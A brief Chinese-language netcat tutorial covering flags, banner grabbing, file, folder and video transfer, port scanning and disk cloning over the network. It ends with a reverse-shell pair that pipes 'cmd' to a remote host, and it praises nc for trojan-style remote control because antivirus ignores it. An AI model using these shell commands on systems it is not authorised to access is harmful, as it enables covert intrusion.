網絡工具中的瑞士軍刀----體積小,功能強大
偵聽模式/傳輸模式
telnet/獲取banner信息
傳輸文本信息,文件,目錄
加密傳輸文件,遠程控制/木馬,加密所有流量(來做遠程控制是非常理想的選擇,因為殺軟不會把nc當成病毒殺掉)
可用作流媒體服務,
遠程克隆硬盤,遠程電子取證信息收集等
常用參數
-v 顯示詳細輸出內容
-n 不進行dns解析
-l 監聽模式
-p 監聽端口號
-z 探測相應的端口有沒有開放
-u 探測udp的端口開放情況
-q 任務完成退出
實例:
連接123.125.50.29的pop3端口,並且獲取了banner信息
nc -lp監聽本機的4444端口並把內容寫到xxsec.txt中,客戶端連接服務端的4444端口,進行遠程操作,用作電子取證的時候可以盡量不破壞證據
服務端把接受到的文件重定向到x.txt文件,客戶端把xxsec.txt文件傳輸到目標
也可以服務端准備好發送的文件,建立監聽,客戶端自定義文件名字連接,即把文件下載到客戶端
先用tar命令打包一個文件夾,不用指定名字,然后nc監聽本機 -q 1 是數據傳輸完成后1秒退出,接着客戶端nc連接目標,並用tar命令解包, (細節不要忘了 - )
服務端cat一個視頻 管道到nc,客戶端連接到服務端,並使用視頻播放器播放(mplayer播放器要自行安裝)
可用來掃描端口,后面必須指定端口范圍
用來克隆硬盤,也可以復制內存,演示就不做了,耗費時間
A:nc -lp 3333 | dd of=/dev/sdb
B:dd if=/dev/sda | nc -nv 192.168.1.10 3333 -q 1
B是被克隆的硬盤,A是要克隆B的硬盤
用來遠程控制
正向:
反向:
windows服務端:nc -lp 6666
客戶端:nc 192.198.1.11 6666 -c cmd
友情鏈接 http://www.cnblogs.com/klionsec
http://www.feiyusafe.cn